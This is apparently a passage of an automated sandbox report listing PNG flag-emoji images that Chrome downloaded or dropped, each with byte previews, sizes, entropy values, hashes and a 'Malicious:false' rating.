                                  Preview:.PNG........IHDR.............e..5...0PLTE.../../../..1..4..)..,.....1..4..6...........`..,n......tRNS..H.+..C...lIDATx..7..1..W U....*W...T......$.D..|....L.Z.....v.f...C$t..C.........g.jB7.3f..c.#w.M*..X...G.5y..sA..GG.^...Xz4......#P/C.}l4....OS.>.... ....I6...O._A.O.K.I..E....+..............V......]...^..6B..!M.'b.!.E.../C.W.&*q.g.S8.d.0...R..i.............3..8.CV.B...4.........x.~.........R...a....+H.I....`.`.(....,...Kn.&.... 3B;9.q.>H....o.X..~..>*B#..z..V...n.}...._..`..T1n.........I.(...g?.2n<.....qx.......?.t..>j.........M!.x~......me...k<....n.l-.b^.....6Xu..........@.;0.......m.J.:p%..!.....@wG|...GN...<.:..X.?..G..)....".r....n.a.....-.e..p...g.1.]... .......4....n.@..+..-XP..0...p.......l.V.1..&.[.LU.S..x!.)..e{|....t..>.....9h1=..60Z....E..b..K..X-.(...S.....K.&.o.[..v.x....5E....?.`Pm._.WY..-.jS.u....I>.. ..Q4..(.:T...3.3pbn|.....+./.Jb..Cp5Z...n.[.....b...g... ]L...Q...(.Mba.....4.....1?m.....uj...h..3..'........0 ..$.l
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4717
                                  Entropy (8bit):7.898305455870484
                                  Encrypted:false
                                  SSDEEP:96:hxncKr0sz4zdxlqC7igwDYVTdZELTUuzERGaB2Cb0FtIVRDFsJhKJW6:hlbz4zdxltigtT3ELT7oRGSwIJIh4T
                                  MD5:33B5316594A76A1C2B0FEEE32F0B5C2D
                                  SHA1:95B9C39BA0725436E1FB9B6C4E7D0017F152D64C
                                  SHA-256:A92BDFDF3EFEC85AA29458BC6F4FE599EE59071DC685102B4773BA3746039118
                                  SHA-512:68FDEAE4C9E44EBCD61FCC28207CCD75BEF0B55B05BA1F9AFE9BAA0B39767685613D5093F570D7A6E4B034E18B27B3F97977BD5F3046D87EE81D77AB0271E0D0
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f3.png
                                  Preview:.PNG........IHDR.....................PLTEGpL!=oZu.b}..*^\x..+^g...*]k...+^Yu........?..4mk...&Y^z.....(g)I~`z.l...*^c~.<[.i...+^b}.Rp..([j.._z..+_g...-`/P.k..]y..-`.2e.#W.......................................................................................................................................................................................................w.......k..t.._..k..e..\..S..`~.^z.Xz.Kz.]w.Pw.Tv.Ur.Is.Kq.?r.Qo.Bo.<m.Ek.Jj.<j.6j.Bf.0f.7d.9c.*d.1c.*c.&b.;_.>^.&a.+`.5^.%`.%`.%`.$_.%^.#^.#^."].#\.!\.&[.+Z. [."Z..Z..Y.,V..X..W..V.#U..V..U.8Qy.T.!R..R..R..Q.*N..Q..P..O..N..N..N..K..L..L..K..J..J..K..I..H..H..H..G..G..F..D..D..E..F..D..D..C..@..C..A..B..B..A..A..A..=..?..=~.>..>..=..<..:x.<..:..;..:..:..7o.7..7..5..6..3..3h.3x.4..3..1o....0e.*...y.,c.,n.$..(].(j.%_.#X..l. T.b#.....tRNS.....%,7@HPVccccehr~~......................................................................................................................:D.t....IDATx...=..D.........n6.;).../.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4119
                                  Entropy (8bit):7.91669029429467
                                  Encrypted:false
                                  SSDEEP:96:M7B/YYpmtUdwhuDqIhLIUg7aduvcDBB5pI5DlI/R9oINvbz:SpYXJu22oEDzcxlIZ9om
                                  MD5:F5FC140F04FBEFDCBB5CB52842D2136E
                                  SHA1:AB671CFF1FEA56FC3578C6D45A01BD0F4FD84646
                                  SHA-256:D8CBE0CB59DB8F82214D60177E7C61DB92394CF0BE545B62DFA6762028A803E3
                                  SHA-512:2D6D5BCA5AD897EDA2078D4BC05C0DEFCCBAF7D7F97313E577CBDDC8361C042B47409205A376393994D5E6A5BBCA419FB5CF14DA65CCE18B7046D9FB0225A7A5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpL5Q]....=Qf...3O`{..3N.sf...m..2O\...s..".Jn.>\i...p .-JPw.c......x..F[.3Uc...3O.l..ui..<d..2M|k.d..Rv.Rz..3N~k.j...q.3O_...n.i...5Ql..]...;W.-H.)E.qZ^.+[r..(...../..9..-..8.....6..,..6..5.....5..3..2.....1..0..3../..=.....2..-..-........,.....?..)..M..-..'.....%..U.."..".^.......)...g.....=...&..Z.<.......).....5.%....c...)..:....%..o..O.....2..u.."..Lk.....e..a....#^..g.qz.I^..T...}.[..I..T|..w.F..Qx.>|..q.Dx._wQ5y.7y.Er.}k./u.8r.Grh&s.8n.&s.%r.%r.%q.)o.$p.8k.#o.,l.$n..o.!n. l.#j.+g..j..j..h. f.1ct(c..f..g..e. b..d..e..c..b.._..a..`..`.._.._..^..]..[..\..X~.[..X..Y..X..Y..X..X..W..W..V..Qv.Rz.T..U..T..Qz.S..S..S..Mq.R..R..Q..M..P..Jm.O..M|.M..N..M..M..Gi.Ir.L..K~.J{.H..Dc.E..Gv.@..@a.Cp.Al.=Y.={.=e.9V.;c.9].6S.6Y.3V..j.0N.+Gl.....6tRNS.....!%357=KTcccceffnx~~~~.............................MiT....IDATx...M.c.y...y.s_t%UU.t.3.L....o.....2d.1.x.!...d...........Y.$x.B !. ....Y8....tO._..Jo....wIB...J..]=...F ..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4464
                                  Entropy (8bit):7.852674502485913
                                  Encrypted:false
                                  SSDEEP:96:qZ1n0Hu8lFUm0BsnWrAWVAXwBpYTLFfUOrrPdhUPKf:qrn0plFsBsQAWqXepYT2Ox
                                  MD5:6BD530861BE1779C95C510CB6D0A342B
                                  SHA1:B28673F76CA1025E5A0E56BCF8469BD13A2038B3
                                  SHA-256:622BFE18B6C4852E6BAFDCBC3D7E4FE845902AAF46D951AE7773E93E416F7A1A
                                  SHA-512:9BA38F90469410A2125BD59181D01DF67935C116909F48DB085C4A40377976BCCB217A55EB2E1BE9D84C17A00AB9E8ABBEA5784D9665A6A3061C9B7FBDFC70F7
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL...5. .lwS.....t.F.%.lxS.+gt...0.gu...../.(E.hvhv....s....8.gu.&=...du....a....5.p~aq.i. .hv..2s}....e. 2CX.o}.ZiH[q..6du.e...cq....._p.f...p~.":..1.lz...bt..crf.......0.....3..L.:L.&@..6....cq.............................................................................................................................................................................u...y........r....u.}.s~...._v.kyr..[.o.rc.akt.pi..xwx.Ue.Nd.\jcx..We.D]_r..N_.EY.:TXm..4R.2P.2OUh..KZ.AU./M.-K.7MLe...K.+I.'GLay.)G.+G.'E.5J.%CC\{.&C."@.)B.!?..>BVo..<y>N. =7Ux..:. ;..8.!:..7.$:..56Mj..3/Nt..3..6..1..3..1...,Il%Jx.....3$Iv..,"Gt..,!Fr..- Er..+.B[P1P../.Cp.Bn!Ah..(.@m..*..%.<b.=j.:g.8].."q.&.7d.5^.4X.5a{...3_p...1]./P./\..Ze...,X.*J.*V.&A.(T.&R.$P."K. :. E..;../.o......tRNS........%'017<>>HJSSSaaijtuw.......................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5666
                                  Entropy (8bit):7.942054749739916
                                  Encrypted:false
                                  SSDEEP:96:5nT57JVAW1CfPLmYh5PY8oVT68J0x30S9GljI/vMjoDmD5oFMKvAYYvvY/HdN:BV7JVAWcfDmYhy8oVT6cI/vSt4MKvAh2
                                  MD5:AE9CC76F78D6663EF7EFE2F1BEE3A31C
                                  SHA1:714C38D6F3B5602CBFF99A7E0547FB1C262E33A8
                                  SHA-256:E64841341B3BD96C9C65AE99BC92CCEA09364843621DD6CE51201CA396C37AF5
                                  SHA-512:1626AA1B931B49E81B7B3D4EA213A5A3C00A9E7C1CD2CD58EFF3149C2E8B3AB9D9EF07BB4285975328CE30FB101FCA7C3D28D2D14DA2D0ED30E331FCE2D8295D
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.Zd.ku.nx.nx.q{.gqs...\g.cn.s}.ku.p{t.!.q{.cm.gq.fq.Yd..=t. v."....7D.CN. /s..l..x.$.q|t. s. q..n..q..r..r...hro..z."..&.6H.3E.-@.O`.>Q.6J.-B.+@.&;.';. 5."5.(;.8E.J\.DX./D.(=."7..5..2../..-../.eq.Vb.?S.:O.7M.0F.+A.#9. 6..3../.....,..*..).'9.%5.N].4K.&<.$;..5..'..&..%.!6."3../.KY.$3.1H./F.-D.,B. 7..4..)..$../..-.3I.)?.'>.....1..0.....,..+........*..1..!..(.,C.."..(.3J.!8.."..%.&=..-..).*A.#:..3.....(..&./J.1H./F..$.6I.+K..+..'._?.GG.!M.n?.h?.&L.UD.-D.)@..*.[B.?G..M.6..7..O..4..1.s>.:F.3J..-..,..3..S..'.dA..Q.NF..1..-..%..)..*..#.:..S.9..%.$;.'D.x;..+..!..&..#..2.+C.N@.."..%.......#F.V=.8../..&.}<.'>..#..I..#..$..'.%;."9..5..4.."..F..".....1..D.E?..J.m7.g7..$../..1..$.....&..'...{....*|.&z."t..q..k...O\.IV._l.Ve.CT.>O.=M.CR.Yh.Td.M^.GX.q{.lw.]h.Wb.gq.\h..1....)tRNS...8Pew.Y%........g..~.cx.....dN-=..l_?1......IDATx^.....0..A..n.8`.>....0..@...`.Q...........f..L./rs.....Zs.{..=C\../.R...4.Pj.Z.....:kJ#..0.4X.(.Y.I..\..."...\p..D%.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5164
                                  Entropy (8bit):7.8578666520584255
                                  Encrypted:false
                                  SSDEEP:96:KH2aEAzEPCt+LuMb+PYVKLtlvdnAQZ/EZlPQgrCfbhWO9Gi6:BAziyJwVStJdrZOxQgrClWO9GP
                                  MD5:170865D40A08ACB78C3673BC336B53CB
                                  SHA1:A4C01EDCD42C83D8F016BC1E6042D1E6DBE62256
                                  SHA-256:766B80062EB646A8A11E53BD7F5705629E47167B75889974EFDF643763132A45
                                  SHA-512:73098288F3DFDBD5E89ABAC1B3CBA556B445667DFAE486797856C0904D79FC1CB27BA79304712AA4AF001FEC636F117DB8902FB2082CAB89552779C6914CB9F1
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...................................................................................................................................................................................................l..R............................ub.......d......bMK..:.x.O7{..%|j..V..........p...lX.....................................................................................................................................uuuzzz...........................~~~yyy~~~.4......z.O.........(.&.%.#.". .....~....w..j............>............`.......6........YC.............................qqq...................................................|||yyyvvvsssrrrrrrttttttxxxyyyxxxwwwyyy|||................................................................tRNS.~......................................................................................................................z~~....;afn%.4Uf.......9[.i....."........................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4912
                                  Entropy (8bit):7.8418637915095415
                                  Encrypted:false
                                  SSDEEP:96:5DbmjepM+w4jUQEwhw+AAlyGGdkUDoedrWYDFHlYVGRm0p6:5bmapZGIN8d3ked8ML6
                                  MD5:9484C455A7B16FF0CD0B05EE0BC89F08
                                  SHA1:343BBE9E5C2DE3994A1E6B18B2947DD08909EE51
                                  SHA-256:1ECB9CAAA6F27604125F3ACCE0ADBDACCCC55C3BD6163C426B5470B92F05E886
                                  SHA-512:D29C861B82B166D91ADDBC128E7B3E33A6609C5FF158335A7259F5AD6C7321B50F60221F543BECBCD3492C630C733F09616A3E3B1187814B23DE3DDC33AEE509
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..........................................................................................................................................8V..........*K..........._f.MU.....................jq.",.)3.-7.;D.............G.......f......%L.#J. G..R..E.&J..E..F..F..F. G.%L(4P..E..?..>..C..K. W."d9Q..........`w....Qj....G_.2Gu........................4..<..I..W..n.y.u..i.w..t.x.w....!G..@............................................:::.........(((...w...}..v|.}..z..z...!..#..&..).,.....0.1.3.6..8..>..A..R..\.f.v.m..k..d.Z.U.B.D..K....5..8..:..<..>..@. B.!C."D.$F.%G.(I.(J.)K.*L.+M.+M.KKKopq...............CDFxyyeefYYY111.7z.._.7m"=x'D.'G.#A. >~.:t.3g.,Y.)R.&O."L.'[.(f.)n..o.'o.&n.'p.(q.)q.*s.+t.,u.-w./x.1z.2{.4}.7~.8|.6u.3m.0e.0b./`..?.....tRNS.~....................................................................................2ARv.....$...............d.g....~i......dC$.......W4....................~..................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6092
                                  Entropy (8bit):7.94313727917092
                                  Encrypted:false
                                  SSDEEP:96:0p2suKmK4hhPuIiSXqYiesgnN7eCWru2/v7o4udZMmJhtUWcEpAYuBKOOcok57Ub:0p2hKmK4hh2IidY3sitbk/nudZeWcEyE
                                  MD5:70C52F8CA971597F47309C4AF60CA93C
                                  SHA1:EB8C691CF126ADC4D5C38F69CF5A5C0E91028F83
                                  SHA-256:1A45624971840A7096188818964EC57B18AFF044F52D666466527B81FAACB911
                                  SHA-512:70C366E7B949AA9E61612C05BF9A50DE8D55B3C2DCCDAF3440F3D5F90DE52E97A016578EB275DD0F4C40954D5E56F1C1D02689E0B759509EB2D05FAFCE4207FE
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..L..7..;VQv..5.DCqk....kg.IDj..6..7..5of......1..5..6..6mj.md......6..:gd......6ma....pm.`]......&a^..KJkd....SOv.gr.ej.r.......{<P2&w0$u..Q..O1%v..O..U.....W$.i0%t.._..T..R).m..Y'.l*.o..b..c..Y&.k.#s..M-!r..\..., p..H.&%.../$r..J..]..S..:..?..5..?..a..v.....-%%{&&}..C......""y.....Q..f..K.....F....""........<....._.##.....F.....c.....`%.Z........8........j..]...../..X.00.....P......".S**w..o...xu......9.AA........p........g...............33..Q...32.......b`....................>>.%)..3....|.SN..................xx....`_.(*........(,.~.............LL......ZX..ll............TS...)%w.1....p.Jc..).c6/jc_.[W.>8{$.`FB|.\Z*!iKD.C<rPJ./&f<2yOIy.ON......._nk.,([3*kjg....%.h..5't....#oVP...Z<5n`\.JDt8-xC=.".g......VR|..V........ .Z..\.._.......ed.ss .^ .e..q....-tRNS.c.....8...../d~.fB..}.vP...R.....~$e~..~....Z....NIDATx^...N.@..QP,Y.bV1".r..@.......{....#$.]...=.w...lm.B.!..B.!..Bv.U.k.1M.\W.#eS..K.Z..L...T:.....0....uY....tB...w5...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5497
                                  Entropy (8bit):7.941502317322381
                                  Encrypted:false
                                  SSDEEP:96:SZugToRZGdmbRfZ5UssVE8JZ26Zt+kanR0Eh6CNWqxrAuNS1rrF2NPKya3Vb7oMx:SwQo1z5i33L+kuRT6gg52NPK/oU
                                  MD5:0A369F4185F6D60AE6CCBFF901890EC4
                                  SHA1:4A84BE85353566DACD0E50C81B3AC1BBAA449C97
                                  SHA-256:AD5F1E34653B7858219AB0EA4DF58F115B85727AC1FB26B179AEB1A400554232
                                  SHA-512:FACC36B0233D17E87AFB6AEBCA77A66FD217B33490A92E888F2F6F70335F2A03DECD6839EC93D6248D5C73DF07206C1F6644E41AB631BDB8803CA3A9A7515EA2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLHtj"MDh...@6b...;1\.~.:/k.._...;1e...:0<oc_...TFj...B8.6+Dvkd...L@.=/e...9/.;1<lai...<2_..f..R.u.9/j...4*_...A7g...<2/cXj...A6.3*.A7\.}...................................,...../..2.....6.......8.....=.......A........G.....Kz..p....Pi..`..v.Uk..X..h..c.[d..O..`..[..^..U..T.]E..W.}N.~X.yL.zF.{Q.x;.{A.xP~t?.b8.v>.sE~r3.sEyn0.p8|n-.l0}l&.m@ti7xj&.l&.l$.k)}h%~k$~j$}j5tg$|i!}j*xg!|h"{h {g3qd.{h#xf.{n.zf*td.ye.xe.ye.wd.wc.vc ta.wi.xc.vb.wp5i^.ua"q`(n_.ta.t`.u`.s_.r^.tn.r^.n].q].p].ri.s].p\.o\.jZ.o[.n[.mZ.kY.pr.mZ.mY.pZ.lY.fV.kX.lX$bT.iW.kW.hV.jV.nX.lw.jV.iV.jx.fT.iU.hU.hT.lU.hT.gT.cR.gS.fS._P.dR.fq.fR.eQ.iS.dP.cP.bO.cP.\M.fN._M.bO.ZK.aN.`M.cL.WI._L.`L._K.^K.]J.TF.\I.]H.[I.SE.\H.[H.[G.ZG.ZE.TD.YF.OB.XE.WD.L?.SB.Q@.I=.N>.K<.F:.C8.H8.G8.@5.D6.>3.?2.:/.<0.7,.4).0&..}.....tRNS......"%188DQSU]cedimy}~..............................IDATx..{p\.}..q...V...d[....l.b 8.....H:L...L...P.0ig.4.t...i.vZ...v..$.C.2....M.../.XX6`.,i.]...9..{W..5.....vW...s.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4955
                                  Entropy (8bit):7.929685248772786
                                  Encrypted:false
                                  SSDEEP:96:ojDM6SGEsNFisVLYnLAaXKgtmLyJ4SsWtjJnpLH9RQyDaHXC3TGz/87:6M6SGxFRV4LAaNmmp9Qyu0TGz/q
                                  MD5:98766D2EBE764DF9BD84A6B933E8EFF7
                                  SHA1:C6631457580DEDF75BEE8A8A22B0ADCAE0939731
                                  SHA-256:7B962CAD70DEBF896B55DCC16FB47E99EDC2B67A24CE81CD2CCAF65D18BD2FAC
                                  SHA-512:32943BA32964B8CC24E48AFED55FF21B03AACF1104E0111B3924143B679471A1ABC13FD87008F20AA1B9B1E9D8293776D0F7A527CA68983FC18AB7E5E0EF753F
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.W*....?_.u$U{..6.u..1.w.>].x.u.B\.A`.?^.A\.r.{.A^.Cb.9X.A`..l.oD~XNzL.IO.....G......*.Q9..!.F..I."(#.I.DJ..D.GM1.W.c.:..........D..@..>......2.Y.@F.#....%+6.].+1.....A..T8..0~...G..B:.`.f.....(..V).7(v..~=.Z*-|.+.P7....U.9.;A.<+y..28.w.e/7..3..$.J"o..o43...>.1.5.j....$q.......v8.6<..4....Ii.,..M....&.l.%s..'....Lp...#X..p.....@.4;....Ee..k.8......$c..=A.}..7W+o..J.;[.,0.O{..U.Rx.j..\.k.b.8..C.{;.J..7.V. [..O....]./t.....h..Dk.@a)k.....[#....3.'._..d..&`..-1.51y.5.[./4H.f....4<)g.....X.CI=.c...5|..J.;@..W#.c.49. ..c..}....2.....p....$.u)...."'.........*......Y.u........\t.M$.e'..X.R^f...j.j......t.V|.J.Z.GP.....$o...H.`^......e.N#..dPt.nS+.Z%.K.w|ms....|Vx..N..........[_......}.U&kB)vO.@Z...:J...Ya...=<V..hz.x......tRNS.~a.bbkc..<.,.Gf..z...(..k.'.....IDATx...o.P..q..5.5..[2}..L!N..CHv...d...CN...2.YEg...X.. A..8.81.r....^I....d.&.....k...d2.L&..d2.L&..d.%MS.....%....e>@..*.B.s.......B...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5203
                                  Entropy (8bit):7.8418630989171865
                                  Encrypted:false
                                  SSDEEP:96:DZvK+9IPliZKhsmd5drPkSZpv9wEkqQfmcSWM4j+w4OQ9rh2:Dk0SiTMdrPkm2EvWS6iw4OQf2
                                  MD5:7E55842D9DEF6DFBF6071EF9AF282C2D
                                  SHA1:2D360500117550C17A795162BF5387BD68BCFD79
                                  SHA-256:BA27A787EEDA853DA0B4081C90BB2CE3A7682AD1BA29ABB422B9229BE7AB3C1C
                                  SHA-512:3DEB9617E8BC8D54FE3208C78800FB74058DD0B17122523B8407820D0B8F384B73DE7F9B74D0B9790805262BD2C0A168BD4368872519496D14AE9CDDF81A5D03
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..y.{.{.|..x.z.}u.xp.tj.qe.k^.eW.`P.[K7.o'x\.~gB.oM.uZ.}d..`..`..s.|.}u..w.yrX{q;scO}p.9).G:}{|}}}...`c}(5.".w +o$0~'5.)7.+:.-<..=./>.$3. ...*..'..$.. |..x..w..r.._..M..B..C.!E..M..Q.![.%d.'n.*}..lHS.ak.w..................................................................xk... ..1!.4#.5%.9(.=-.B1.H7.L<.N=.SB.WF.XG.C0.......{..:'...+..UF.j_._R.YL.NA.C3.B4.>1.7,.<1.SG.[P.cX.kb.sk.zr.wo.vn.rk..M..L..L. D..E71R..M..N..L..I.#`_..d.~........................6..(.lQ.oU.fP.]H.\I._L.C1.;*.9).:*.9).=,.D1.M8.U=.\@.bH.fL.hJ.jM.mO.oQ.qT.tW.wZ.y[.{].}_..a..c..d..f..g..i..k!.l".m$.o%.p&.q.._.{[C.~Q..3.v.............s..d..........vX....&.............".(.%.".....?.}lj.H.ueA.Q.k\g.0.................y..i..f..n.}c..:)gQ.J8.5(.[D.#...........................tRNS...a...................2Bp...............................................................................................c.........xgF,....a7`b1............c.}.h.............
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5106
                                  Entropy (8bit):7.893008103472998
                                  Encrypted:false
                                  SSDEEP:96:h2hDvfachVGQRoLmVWbY3Wh/MTUXLTwWqHxpHVU7wg/jygPlDIB32jjkNes:hivfa6VG0+Y3Wh8WQWaLHV6v/jVD82je
                                  MD5:8BDF0F23AF51A64120AFAC295B07DB67
                                  SHA1:2F8B1A9EF2409A6A55F1C615C27F5832C2E2AE3E
                                  SHA-256:0C9AFB662E6B3F9F2B0AC0AD8D026835EC356DE5AB196DC78D4E10614E9808E1
                                  SHA-512:57A4D787E2864B04120534A7223EC7D05A9ADCFA8EFE3BB8229BDAB37EC2A8AEED4C99C330E87B6F93A4AA15924A3F27031A02B7F896AF6148A4F48D1B5D7173
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLiDGcJLa-1f..ggge..kii`."hhh. ,\..cccb.!aaac....,u...)5eeeg..iiiJKKg..dddiiie..bbbi..+..jjjh..t18`...............................:.....7.....8..7........"..5..3..7..8..7..5.......6..U..4...../..W....1....l.1....u....../.y....../U..i...dpA...+H...{}0...L[.x+&..%..$..#..!........kjj.}..~..{....fff.4E.x..2B.y.Kt.~.bbbrd*.y..u._Y..0@;f...?.s.^^^.2G.,=.u..-=.>_.*;[[[.o..,<.(9YYY.$6.o..&7.'7WWV.$5.*:lDq..-.#4`V+TTT.!2. 1.c...-QQQ.(6...../.!1..0....!0..'..-..,MMM."0..*..+.&3UL&..)..*III..)..(.V...'..,.!......#..&FFF..%.!-..&..$DDD..$..#.."BBB.."..!..%JB&..*..!...@@@.....%....Ku..)...<<<.....#}.&...888..!...<8&s.$.=[444n."......10/u..k..--,z..Y..u..n..e..**).*6'&&e..$$$^..!!!.. .........C.... ...1.......!..............!........... .............. ......)..p....tRNS...!17?GP_ccjlyx~~...............................................................................................................f..s...#IDATx..{.\.}..u.3..;..w16`...T.*mC+. @.jEQ
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5134
                                  Entropy (8bit):7.921430161896601
                                  Encrypted:false
                                  SSDEEP:96:nEosGcof4reAlHnD8klKJB06E0y1yKV5bSAwWAnZUcE877:nE3GOllHnYfbAv5REZUcE8v
                                  MD5:A3A386A3B6B64E48F01FBFE1FCD97E09
                                  SHA1:06AC3948A92DC787BD88C4C3576C5CC35D08F7D4
                                  SHA-256:516DA7A87B16427CA5DC69CA212A0498EA26BEFC46CEA162F561F24D0A77FC4E
                                  SHA-512:F96DF3A32BDB1A05D788F421985A247348FDADDD41011B0737089B997D3C1830C7D0DF78A8FA584E8E878360F9A7A90E460AA7FAD9ED3A9D961224FA8DEE788C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1eb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLt.z.;....q.zv...9.p.z....:.x.~...s.{.H*....8.}....._.p.[5.:.3mJ...bnfd.t.9.EyY.C.....\?...d.t.<.....:....c.sJw[.8.......h.xT.f....;.f.v.L-....<....e.u....9.........e.uRn]X.h........................................................................................................................................................................................................................}.....y..s.....l........f........v..a.|...].x...V.s...g.wP.na.rJ.i].nE.eC.bA.aV.i<.]P.dI.`7.YN.b2.U1.T@.Z/.SE}[-.Q,.P:~T*.N'.K7yQ0}N?tT#.H)yH!{D-tH {C6mK.zB.yB&tD.yA.xA.w?.v?.t?.u>.t>.t=.q?.s=1eE.s;.u9.r;.o=.q;.t9 l=.q:.p9 j=.o8.n9.l9.n7.n6.m6.m6.l6.i6.k5.d:.k4.j4.f6.b8.i3.h3.h1.g1.g0.f1.f/.e0.b2.\6.e..Z5.d..c-.a..^/.[/.]+.T/.X).S).N,.P%.K%.G'.G!.D..@!.=..:..7.9a.`....tRNS.......'//5ACBMRU\cbbdmoqu~~..............................................................................................................................^.u....#IDATx.._o.W...s.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4644
                                  Entropy (8bit):7.9123396017004035
                                  Encrypted:false
                                  SSDEEP:96:tzFtubwvsyTT9ToatV6mQRSCcslHkhjLEoss7wLUo2rL:V/u8vbZTVtV71slsX8Sv
                                  MD5:990DD632F1EF86AB4861FAF1CF7BE285
                                  SHA1:2E042FDE260ABD268F9FEFB6F8B21526983FCD17
                                  SHA-256:CA405E0798AACE9D063D62737BCC45F18706641EEF4E52B5B88E8EB84AB3302A
                                  SHA-512:18990ABFF9DA26E08675FA73E210F02B540A9613B6DAE444149B58BA4D730136DC9B19C46DE359628F9AAA5F77EF3407C238177222CF31CDA48034B2674D2D1F
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1eb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLG$..oiqWL05.c.a9I#=...jjb.b.H.E...b..o....aaa.H..lle..a.a....O.,,,....mmb.bcccg...I.....llbbb.klg......llccc`.`.O....g..cdd.ll...LLL.I.edd.N.].]e.e...................................u..x..f.o....^.j.U...v.[...J.U.C.zy.z..sr.?.xS.kl.|2....t9.kS.ed....e@.\\.h..VR.a+.U-.IH.. .M"......6. ....C(.:7....<.___.4%....//...ZZZ....*).-..+*.&&.''....$$.%%.$$SSS.%#.##...."".$"..!.!!.~...#.y.PPP.... ...OOO......NNN."!..............!......KJJ....... .}..o.....v..l..........DEE....m..e....@??....].....c..Y.....S.~...V.y..<.....000p..i...H.)((*.....$....................................................................=.;:.:5.3!.!...F.E.<<..........TT.FF.aa,.):.<.AA...).).ZZM.M...S.S.......hh.NN.........).(......................66.. 777,.%....2tRNS......'7:AJPccdeedmm~.............................R.......IDATx^..IK.@..ai.t...(."......".d..u...D.^.........?'..!..B.!..B...A..Y..B.a.K.e..D.../lh%........G.I.j.ot.I......J..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4082
                                  Entropy (8bit):7.789732533377982
                                  Encrypted:false
                                  SSDEEP:96:KEi7rkHBHXZV+a+LVJs62IDJo9hdhf7WOsu:Xi7rWHX3+aOVO3IDJo9p7WDu
                                  MD5:0A48FD684B5222189D6E49ECCC153BCD
                                  SHA1:94B240EF4B26522E8EA8E97A659BE1AD7DC67852
                                  SHA-256:9EAEB57BEBE394337C0109B5F93B150AF46A66EE9CF74A3B38E1E59E710954DB
                                  SHA-512:36A9389EFB14E4B0ECE782CB5E01D248D342730A4DF0562BFEEC7628C8DF4450C2880037DF3D857FBBC43ABC3CF383EFB17E76651A8B6E387AA7BA9EE972AE07
                                  Malicious:false
                                  Reputation:low
